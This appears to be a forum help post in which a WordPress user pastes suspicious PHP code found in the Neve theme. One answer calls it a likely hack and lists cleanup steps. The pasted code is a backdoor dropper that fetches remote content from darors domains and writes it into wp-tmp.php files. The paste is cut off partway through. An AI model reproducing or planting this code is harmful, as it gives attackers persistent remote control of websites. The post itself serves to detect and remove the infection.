I have code like below in neve theme WordPress. I feel suspicious about this code
$wp_auth_key='ac15616a33a4bae1388c29de0202c5e1';
if (($tmpcontent = @file_get_contents("http://www.darors.com/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.darors.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {
if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
@file_put_contents('wp-tmp.php', $tmpcontent);
}
}
}
}
elseif ($tmpcontent = @file_get_contents("http://www.darors.pw/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false ) {
if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
@file_put_contents('wp-tmp.php', $tmpcontent);
}
}
}
}
elseif ($tmpcontent = @file_get_contents("http://www.darors.top/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false ) {
5 Answers
I would agree that there is a strong possibility of a hacked site with that code. The @file_put_contents statement is trying to write to your wp-admin folder. That’s not good.
So I would recommend a de-hacking inspection. If you think your site got hacked, there are several (many) things you must do to ‘de-hack’ it. Including:
- changing all passwords (WP admins, FTP, hosting, database)
- reinstalling WP (via the Updates page) and then reinstalling all themes (from the repository) and plugins manually.
- checking for unknown files (via your hosting File Manager; if you sort by date, invalid ones should stick out because you updated everything).
There are lots of help in the googles on how to de-hack a site. I wrote a set of procedures that I use. It can be done, though, just takes a bit of work.